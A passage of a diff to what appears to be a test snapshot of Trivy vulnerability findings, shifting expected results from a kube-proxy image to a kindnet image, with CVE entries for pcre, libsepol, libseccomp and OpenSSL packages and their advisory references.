"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: Integer overflow when parsing callout numeric arguments", + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-14155", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", - }, - { - "type": "URL", - "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-14155", - }, - { - "type": "URL", - "value": "https://bugs.gentoo.org/717920", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-11164", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://openwall.com/lists/oss-security/2017/07/11/3", @@ -161163,7 +161564,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ @@ -161213,9 +161614,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-16231", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", @@ -161233,7 +161634,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ @@ -161291,9 +161692,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-7245", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://www.securityfocus.com/bid/97067", @@ -161307,7 +161708,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ @@ -161349,9 +161750,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2017-7246", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://www.securityfocus.com/bid/97067", @@ -161365,7 +161766,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ @@ -161407,9 +161808,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2019-20838", - "installedVersion": "2:8.39-12", + "installedVersion": "2:8.39-13", "packageName": "libpcre3", "references": [ "http://seclists.org/fulldisclosure/2020/Dec/32", @@ -161435,7 +161836,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ @@ -161525,122 +161926,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9893", - "installedVersion": "2.3.3-4", - "packageName": "libseccomp2", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", - "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", - "https://access.redhat.com/errata/RHSA-2019:3624", - "https://access.redhat.com/security/cve/CVE-2019-9893", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", - "https://github.com/seccomp/libseccomp/issues/139", - "https://linux.oracle.com/cve/CVE-2019-9893.html", - "https://linux.oracle.com/errata/ELSA-2019-3624.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", - "https://seclists.org/oss-sec/2019/q1/179", - "https://security.gentoo.org/glsa/201904-18", - "https://ubuntu.com/security/notices/USN-4001-1", - "https://ubuntu.com/security/notices/USN-4001-2", - "https://usn.ubuntu.com/4001-1/", - "https://usn.ubuntu.com/4001-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-9893", - "https://www.openwall.com/lists/oss-security/2019/03/15/1", - ], - }, - "category": "Vulnerability", - "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "libseccomp: incorrect generation of syscall filters in libseccomp", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9893", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", - }, - { - "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", - }, - { - "type": "URL", - "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2019:3624", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://github.com/seccomp/libseccomp/issues/139", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://seclists.org/oss-sec/2019/q1/179", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/201904-18", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-2", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4001-1/", - }, - { - "type": "URL", - "value": "https://usn.ubuntu.com/4001-2/", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", - }, - { - "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36084", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36084", @@ -161667,7 +161955,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ @@ -161761,9 +162049,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36085", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36085", @@ -161790,7 +162078,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ @@ -161884,9 +162172,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36086", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36086", @@ -161913,7 +162201,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "use-after-free in cil_reset_classpermission()", "references": [ @@ -162007,9 +162295,9 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2021-36087", - "installedVersion": "2.8-1", + "installedVersion": "3.1-1", "packageName": "libsepol1", "references": [ "https://access.redhat.com/security/cve/CVE-2021-36087", @@ -162037,7 +162325,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ @@ -162134,148 +162422,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: SM2 Decryption Buffer Overflow", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", - }, - { - "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", - }, - { - "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-1292", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2022:6224", @@ -162319,7 +162469,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "c_rehash script allows command injection", "references": [ @@ -162397,221 +162547,19 @@ and the severity is therefore considered low.", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - }, - { - "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - }, - { - "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", - }, - { - "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", - ], - }, - "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", - "location": 